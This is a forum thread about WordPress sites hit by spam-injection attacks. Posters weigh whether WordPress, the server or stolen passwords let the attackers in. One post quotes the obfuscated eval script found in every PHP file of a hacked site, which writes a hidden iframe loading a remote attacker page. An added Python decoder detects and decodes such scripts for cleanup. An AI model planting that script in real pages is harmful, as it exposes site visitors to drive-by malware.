Variations of the spam injection link attacks have been ongoing for a long time. I have yet to be hit by them. If indeed this was a vector introduced by WordPress, why are more sites not being affected on a grand scale?
I understand that until you know it's not WordPress or it's WordPress, there is not much you can do.
No, it was not a security release.
http://wordpress.org/development/201...rdpress-2-9-2/
To the best of my knowledge, there is no "new attack" going round.
My point is that it is still unlikely that they are getting into your systems via a security problem in WordPress. 99% of all "hacks" are done through other means. WordPress can be, and often is, targeted even without having some kind of hole in it. All they need is to get a piece of code to run on your system and it can "auto-hack" all your WordPress sites from behind.
In other words, the attack vector doesn't have to be WordPress just because your WordPress sites have the malicious code in them. Until you know how that code gets there, you don't know what the attack vector is. Seriously, we've seen hacks that are basically Windows viruses which steal FTP passwords and then will hack WordPress installations through there... WP is a big fat juicy target.
Understood. I realize the attack may not involve a security flaw in WordPress itself. If the attack involves a weakness in our server setup, I'd be curious to learn what the attack is.
By the way, FTP is not installed on this server. We only allow SFTP connections, which should make it much more difficult for anyone to steal username/passwords.
SFTP theoretically makes it harder to steal usernames/passwords but it doesn't do anything to stop hackers from guessing an insecure password.
Ok well, does anyone have any further updates regarding what happened?
Just found this thread...
I also cleaned and restored three blogs last week that had been compromised; spam-injected code was added to redirect the site. The files infected were the WordPress wp-config.php file, the theme files for the activated theme, and plugin files, and all WordPress core files. The only files that were affected were PHP files.
Two sites were at 123-reg.co.uk.
I restored everything and checked every file on these sites for bad code, checked the database and then recommended all passwords should be changed for WordPress and the hosting accounts.
If the sites happen to get hacked again then it's no doubt a server flaw or loophole.
A lot of hosts nowadays don't keep server software and packages up to date; most are far out of date because it would take a whole lot of time to update a whole server farm etc.
The below code is what was in every PHP file throughout one site:
Another site had a script which would take up about 10 posts on this forum....
<script>var VkXmR6='d$!#o$!#c$!#u$!#m$!#e$!#n$!#t$!#.$!#w$!#r$ !#i$!#t$!#e$!#($!#\'$!#<$!#i$!#f$!#r$!#a$!#m$!#e$! # $!#s$!#r$!#c$!#=$!#"$!#h$!#t$!#t$!#p$!#:$!#/$!#/$!#g$!#e$!#o$!#n$!#o$!#n$!#.$!#n$!#e$!#t$!#/$!#i$!#n$!#.$!#p$!#h$!#p$!#"$!# $!#w$!#i$!#d$!#t$!#h$!#=$!#1$!# $!#h$!#e$!#i$!#g$!#h$!#t$!#=$!#1$!# $!#f$!#r$!#a$!#m$!#e$!#b$!#o$!#r$!#d$!#e$!#r$!#=$! #0$!#>$!#<$!#/$!#i$!#f$!#r$!#a$!#m$!#e$!#>$!#\'$!#)$!#;$!#';eval (VkXmR6.split('$!#').join(""));</script>
Last edited by Martin; 03-29-2010 at 01:59 AM.
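An added example, not part of the original thread or any poster's code: a static decoder for the `split`/`join` obfuscation in the script quoted in the post above, which finds such blocks in `.php` files and recovers the hidden iframe URL without executing anything. The function names and the sample input (pointing at `example.invalid`) are constructed for illustration.

```python
import re
from pathlib import Path

# Matches: <script>var NAME='...';eval(NAME.split('DELIM').join(""));</script>
INJECT_RE = re.compile(
    r"""<script>\s*var\s+(?P<name>\w+)\s*=\s*'(?P<body>(?:\\.|[^'\\])*)'\s*;\s*"""
    r"""eval\s*\(\s*(?P=name)\.split\(\s*'(?P<delim>(?:\\.|[^'\\])+)'\s*\)"""
    r"""\.join\(\s*(?:""|'')\s*\)\s*\)\s*;?\s*</script>""",
    re.IGNORECASE | re.DOTALL,
)
IFRAME_SRC_RE = re.compile(r"""<iframe[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def unescape_js(s):
    # Resolve simple backslash escapes (\' \" \\) inside the JS string literal.
    return re.sub(r"\\(.)", r"\1", s)


def decode_injections(text):
    """Return [(decoded_js, [iframe_urls])] for each injected block; nothing is executed."""
    findings = []
    for m in INJECT_RE.finditer(text):
        delim = unescape_js(m.group("delim"))
        # Same order as the browser: unescape the literal, then split/join on the delimiter.
        decoded = "".join(unescape_js(m.group("body")).split(delim))
        findings.append((decoded, IFRAME_SRC_RE.findall(decoded)))
    return findings


def scan_tree(root):
    """Map each *.php file under root that carries the injection to its findings."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = decode_injections(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits


# Constructed sample (not taken from a real site): same delimiter scheme, harmless URL.
PLAIN = "document.write('<iframe src=\"http://example.invalid/in.php\" width=1 height=1></iframe>');"
SAMPLE_PHP = ("<?php echo 'ok'; ?>\n<script>var aB1='"
              + "$!#".join("\\'" if c == "'" else c for c in PLAIN)
              + "';eval (aB1.split('$!#').join(\"\"));</script>\n")

if __name__ == "__main__":
    for js, urls in decode_injections(SAMPLE_PHP):
        print("decoded:", js)
        print("iframe targets:", urls)
```

Run `scan_tree()` against a restored copy of the web root to confirm the cleanup reached every PHP file, and compare the recovered URLs across sites to tell whether the infections share a source.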
Hmm, how in the world does code get injected into wp-config.php, since that file is supposed to be locked down to the point where even the owner of the file has only viewing permissions and cannot write to it?